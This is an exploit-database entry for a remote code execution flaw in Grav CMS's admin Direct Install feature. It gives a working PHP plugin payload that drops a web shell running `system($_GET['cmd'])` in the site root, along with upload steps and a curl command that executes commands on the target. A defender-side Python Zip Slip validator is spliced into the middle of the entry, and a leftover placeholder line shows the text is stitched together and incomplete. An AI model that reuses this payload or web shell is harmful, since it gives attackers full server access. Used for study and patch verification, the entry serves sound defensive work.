Grav CMS 2.0.0-beta.2 - Remote Code Execution
EDB-ID: 52578
CVE: 2026-42607
EDB Verified:
Author: MUSTAFA MURAT AKGÜL
Type: WEBAPPS
Platform: PHP
Date: 2026-05-26
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE)
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)
Technical Details:
The "Direct Install" feature of the Grav CMS Admin plugin allows administrators
to upload plugins as ZIP files. The system did not adequately validate the
contents of the ZIP archive, nor did it prevent path traversal (Zip Slip) during extraction.
By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized),
an attacker can execute arbitrary PHP code or drop a persistent web shell in the web root.
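As an added defender-side check (not Grav's own code), the following Python validates a plugin archive for Zip Slip before anything is extracted: every entry name is resolved against the intended plugin directory, and absolute paths, '..' escapes and symlink entries are reported. The destination directory and the sample archive are constructed for this example.

```python
import io
import posixpath
import stat
import zipfile

# Hypothetical destination directory for this example; nothing is written to disk.
PLUGIN_DIR = "/srv/grav/user/plugins"


def zip_slip_entries(zip_bytes: bytes, dest_root: str = PLUGIN_DIR) -> list:
    """Return archive entry names that would be written outside dest_root.

    Each name is joined to dest_root and normalised, so '..' segments and
    absolute paths are caught before extraction. Symlink entries are rejected
    as well, since a link pointing outside the plugin directory can be
    followed by a later entry in the same archive.
    """
    root = posixpath.normpath(dest_root)
    unsafe = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            mode = info.external_attr >> 16  # Unix mode bits, if present
            if name.startswith(("/", "\\")) or "\\" in name:
                unsafe.append(name)  # absolute path or Windows separator
                continue
            target = posixpath.normpath(posixpath.join(root, name))
            if target != root and not target.startswith(root + "/"):
                unsafe.append(name)  # resolves outside the plugin directory
            elif stat.S_ISLNK(mode):
                unsafe.append(name)  # symlink entry
    return unsafe


def build_sample_zip() -> bytes:
    """Constructed sample: the plugin layout from the advisory plus two
    traversal entries that a safe installer must refuse."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("shellplugin/blueprints.yaml", "name: shellplugin\n")
        zf.writestr("shellplugin/shellplugin.yaml", "enabled: true\n")
        # '..' inside the plugin tree is harmless once normalised
        zf.writestr("shellplugin/sub/../shellplugin.php", "<?php // placeholder\n")
        zf.writestr("../../shell.php", "<?php // would land two levels up\n")
        zf.writestr("/etc/cron.d/evil", "")
    return buf.getvalue()


if __name__ == "__main__":
    print(zip_slip_entries(build_sample_zip()))
    # -> ['../../shell.php', '/etc/cron.d/evil']
```

Note that a naive substring check for '..' would wrongly reject the in-tree entry; normalising the full target path is what distinguishes the two cases.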
Proof of Concept (PoC):
1. Create a malicious plugin structure:
- shellplugin/blueprints.yaml
- shellplugin/shellplugin.yaml
- shellplugin/shellplugin.php (Payload below)
--- shellplugin.php ---
<?php
namespace Grav\Plugin;

use Grav\Common\Plugin;

class ShellpluginPlugin extends Plugin
{
    public static function getSubscribedEvents(): array
    {
        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
    }

    public function onPluginsInitialized(): void
    {
        $shell_path = GRAV_ROOT . '/shell.php';
        if (!file_exists($shell_path)) {
            file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
        }
    }
}
----------------------
2. Compress the directory:
$ zip -r shellplugin.zip shellplugin/
3. Log in to the Grav Admin panel and navigate to:
/admin/tools/direct-install
4. Upload the 'shellplugin.zip' file.
5. Once installed, the plugin triggers on the next request to the site,
dropping a shell at the root.
6. Access your shell:
curl "http://<target>/shell.php?cmd=id"
Exploit Script (Python):
[You can add the Python script you shared above here]
Impact:
Full system-level access under the context of the web server user. An attacker
with administrative privileges (or via CSRF) can compromise the entire server.